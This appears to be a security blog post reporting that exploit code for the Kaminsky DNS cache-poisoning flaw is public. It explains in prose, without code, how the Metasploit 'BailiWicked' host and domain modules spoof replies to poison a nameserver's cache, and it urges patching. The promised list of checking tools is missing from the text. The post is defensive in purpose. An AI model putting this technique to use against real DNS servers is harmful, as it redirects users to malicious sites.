Advanced Threats Researcher Paul Ferguson, along with other security researchers, saw it coming. The code that can exploit a flaw in Domain Name System (DNS) servers—discovered and disclosed by Dan Kaminsky early this month—is confirmed to be in the wild.
Ferguson’s initial report of such a code (CNet News has also speculated about this), and the confirmation reported by The Register late last week finally put an end to the one question that troubled the security industry since Kaminsky’s discovery. These also justified the major security threat that most recipients of the news had initially dubbed as “shameless hype.” We now expect people to start taking this seriously.
The Kaminsky DNS-cache vulnerability allows hackers and phishers to redirect DNS queries, which Kaminsky found to be the method used by Netdevilz, a Turkish hacker group, when they hacked into Photobucket last month. And just last week, two exploit codes have been developed by security researchers from Computer Academic Underground (CAU) and the Metasploit Project. Both organizations have also made public these exploit codes via their respective blog entries.
Constant reader, meet the BailiWickeds—DNS BailiWicked Host Attack and DNS BailiWicked Domain Attack: brothers in arms.
CAU’s |)ruid (read as “druid”), who programmed most of the exploit codes, explains in this blog entry how the tandem can successfully use an unpatched DNS server to online threats. The host attack module is responsible for “injecting individual uncached host records into the target nameserver’s cache,” which means that a hacker can use this module to send out a lot of spoofed reply packets back to the querying client (probably a lot faster than the reply from a real DNS server) in hopes of matching the information, such as transaction ID and source port, from the query sent by the client. Note that to the client, the hacker may take the form of a legitimate DNS server since the hacker throws back responses.
The Domain attack module, on the other hand, replaces “a target domain’s nameserver records in a target nameserver’s cache,” which means that a hacker can use this module to overwrite additional information in a reply packet typically sent by a DNS server to a querying client once the source port and transaction ID are determined. Note that, at this phase, hackers can point users to malicious sites via the spoofed information in the reply packet.
Current BailiWicked codes have been fine-tuned to predict the “dead air” between outgoing query packets and incoming reply packets and vice versa. This enables the exploit to determine the number of spoofed replies it can send to the querying client.
We implore our users to check if their DNS are vulnerable to such exploits by using any of the following tools:
And, yes, we could not stress this more: PATCH NOW.